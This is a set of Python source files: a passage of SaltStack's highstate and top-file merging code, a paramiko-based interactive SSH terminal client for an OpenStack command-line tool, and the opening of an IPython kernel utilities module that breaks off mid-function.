self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{0}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{0}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in six.iteritems(tops):
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
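# Illustrative sketch (editor's note, not original code): given
#   tops = {'base': [{'base': {'*': ['core']}}],
#           'dev':  [{'dev': {'*': ['webserver']}, 'base': {'*': ['other']}}]}
# this strategy returns {'base': {'*': ['core']}, 'dev': {'*': ['webserver']}};
# the 'base' section inside the 'dev' top file is dropped because its saltenv
# does not match the environment that top file came from.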
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in six.iteritems(tops):
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in six.iteritems(ctop):
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
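# Illustrative sketch (editor's note, not original code): with default_top set
# to 'base', a 'dev' saltenv whose own top file is empty falls back to the
# 'dev' section of the 'base' top file; sections for any other saltenv found
# in that fallback file are ignored.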
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, six.string_types):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in six.itervalues(tops):
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
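# Illustrative sketch (editor's note, not original code): if two top files both
# target '*' in saltenv 'base', e.g. with ['core'] and
# [{'match': 'glob'}, 'core', 'edit'], the merged target becomes
# [{'match': 'glob'}, 'core', 'edit']: a single match-type dict is kept and the
# state lists are concatenated without duplicates.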
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in six.iteritems(tops):
if saltenv == "include":
continue
if not isinstance(saltenv, six.string_types):
errors.append(
"Environment {0} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {0} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in six.itervalues(matches):
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in six.itervalues(slsmod):
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {0}: {1} file".format(slsmod, val)
)
elif isinstance(slsmod, six.string_types):
# This is a sls module
if not slsmod:
errors.append(
"Environment {0} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in six.iteritems(top):
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in six.iteritems(body):
def _filter_matches(_match, _data, _opts):
if isinstance(_data, six.string_types):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in six.iteritems(_tmpdata):
_filter_matches(match, data, _opts)
if isinstance(item, six.string_types):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {0} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {0} in saltenv {1} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{0}:{1}' failed: {2}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {0} failed, render error: {1}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{0}\n{1}".format(msg, traceback.format_exc()))
try:
mods.add("{0}:{1}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {0} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {0} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
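# e.g. (illustrative) a relative include of '..common.users' inside SLS
# 'base:webserver.config.nginx' strips two trailing components from the
# current SLS and resolves to 'webserver.common.users' in the same saltenv.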
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{0}' found in include "
"of '{1}' within SLS '{2}:{3}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {0} found in include "
"in SLS '{2}:{3}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{0}' "
"within SLS '{1}:{2}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{0}:{1}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {0}: {1} is not available on the salt "
"master in saltenv(s): {2} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {0}: {1} is available on the salt master "
"in multiple available saltenvs: {2}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, six.string_types):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Includes or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(six.iterkeys(arg)) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], six.string_types):
# If this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {0} in SLS {1} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{0}' in SLS '{1}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{0}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
(
"Extension name '{0}' in SLS '{1}' is "
"not a dictionary".format(name, sls)
)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = (
"Exclude Declaration in SLS {0} is not formed "
"as a list".format(sls)
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in six.iteritems(matches):
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{0}' found".format(saltenv)
)
# if we did not find any sls in the fileserver listing, this
# may be because the sls was generated or added later; try to
# execute it directly, and if that fails it will just return
# the earlier error
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{0}:{1}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(sls, saltenv, mods, matches)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {0} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{0}' "
"in env '{1}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (six.iteritems(ext) for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{0}' and is found in SLS"
" '{1}:{2}' and SLS '{3}:{4}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {0}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{0}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += six.text_type(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, six.string_types):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except (IOError, OSError):
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
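# Illustrative sketch (editor's note, not original code): each low chunk
# returned above is a flat dict roughly of the form
#   {'state': 'pkg', 'fun': 'installed', 'name': 'nginx', '__id__': 'nginx',
#    '__sls__': 'webserver', '__env__': 'base', 'order': 10000}
# i.e. one entry per state function call, with any requisites and arguments
# carried along as additional keys.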
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState(object):
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
shell.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import signal
import paramiko
from socket import socket
from threading import Thread
from typing import TextIO
from openstack_cli.modules.apputils.terminal.get_terminal_size import get_terminal_size
from openstack_cli.modules.apputils.terminal.getch import getch as _getch, FUNC_KEYS, NCODE_KEYS, VTKEYS
F12MENU = False
SIGINT = False
def _f12_commands(channel: paramiko.Channel):
global F12MENU
global SIGINT
_k = _getch()
if _k == FUNC_KEYS.F12.value:
F12MENU = not F12MENU
print(f"\n Character code debugging is: {F12MENU}")
if F12MENU:
print("> ", end='', flush=True)
elif _k == (99,): # C:
SIGINT = True
elif _k == (105,): # I
t: paramiko.Transport = channel.get_transport()
sock: socket = t.sock
localname, peername = sock.getsockname(), sock.getpeername()
local = localname if localname else ("unknown", 0)
remote = peername if peername else ("unknown", 0)
print(f"""
Connection: {t.local_version} -> {t.remote_version} ({'active' if t.active == 1 else 'inactive'}, auth: {t.authenticated})
Local endpoint: {local[0]}:{local[1]}, host key type = {t.host_key_type}
Remote endpoint: {remote[0]}:{remote[1]}, cipher type = {t.remote_cipher}, mac = {t.remote_mac}
Preferred:
Ciphers: {','.join(t.preferred_ciphers)}
Keys: {','.join(t.preferred_keys)}
Macs: {','.join(t.preferred_macs)}
""")
else:
return chr(7)
def getch(channel: paramiko.Channel):
global SIGINT
if SIGINT:
SIGINT = False
return chr(3)
ch = _getch()
if F12MENU and ch != FUNC_KEYS.F12.value:
print(f"{ch} ", end='', flush=True)
return
elif ch == FUNC_KEYS.F12.value:
return _f12_commands(channel)
elif ch in VTKEYS:
return VTKEYS[ch]
elif ch == NCODE_KEYS.TAB.value:
return "\t"
elif ch in (NCODE_KEYS.ENTER.value, NCODE_KEYS.BACKSPACE.value, NCODE_KEYS.ESC.value):
pass
return "".join([chr(c) for c in ch])
def _sigint(signum, frame):
global SIGINT
SIGINT = True
def __buffered_reader(stdread: paramiko.ChannelFile, stdwrite: TextIO):
global SIGINT
import select
import time
channel: paramiko.Channel = stdread.channel
while not SIGINT and not channel.exit_status_ready():
if channel.recv_ready():
r, w, x = select.select([channel], [], [], 0.0)
if len(r) > 0:
stdwrite.buffer.write(channel.recv(1024))
stdwrite.flush()
else:
time.sleep(0.2)
SIGINT = True
def __input_handler(stdin: TextIO, rstdin: TextIO, channel: paramiko.Channel):
global SIGINT
while not SIGINT:
buff = getch(channel)
if buff:
if isinstance(buff, str):
buff = buff.encode("UTF-8")
rstdin.write(buff)
def __window_size_change_handler(channel: paramiko.Channel):
width, height = get_terminal_size()
while not SIGINT:
time.sleep(1)
nwidth, nheight = get_terminal_size()
if nwidth != width or nheight != height:
width, height = nwidth, nheight
channel.resize_pty(width=width, height=height)
def shell(channel: paramiko.Channel):
stdin: paramiko.ChannelFile = channel.makefile_stdin("wb")
stdout: paramiko.ChannelFile = channel.makefile("r")
stderr: paramiko.ChannelFile = channel.makefile_stderr("r")
print("Tip: F12 + I to show connection info, F12+C to close connection")
stdoutReader = Thread(target=__buffered_reader, name="stdoutReader", args=(stdout, sys.stdout))
stderrReader = Thread(target=__buffered_reader, name="stderrReader", args=(stderr, sys.stderr))
stdinWriter = Thread(target=__input_handler, name="stdinWriter", args=(sys.stdin, stdin, channel))
sizeHandler = Thread(target=__window_size_change_handler, name="TerminalSizeWatchdog", args=(channel,))
sizeHandler.setDaemon(True)
stdoutReader.setDaemon(True)
stderrReader.setDaemon(True)
stdinWriter.setDaemon(True)
orig_sigint = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, _sigint)
sizeHandler.start()
stderrReader.start()
stdoutReader.start()
stdinWriter.start()
stdoutReader.join()
finally:
print("Closing ssh session...")
try:
channel.close()
except:
pass
signal.signal(signal.SIGINT, orig_sigint)
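# --- Usage sketch (editor's addition, not part of the original module) -------
# A minimal example of how shell() might be driven; the host name and
# credentials below are hypothetical placeholders.
def _example_interactive_session():  # pragma: no cover
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # hypothetical endpoint and credentials
    client.connect("ssh.example.org", username="demo", password="secret")
    width, height = get_terminal_size()
    chan = client.get_transport().open_session()
    chan.get_pty(term="xterm", width=width, height=height)
    chan.invoke_shell()
    try:
        shell(chan)
    finally:
        client.close()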
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
import sys
from subprocess import Popen
from threading import Event, Thread
from uuid import uuid4
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
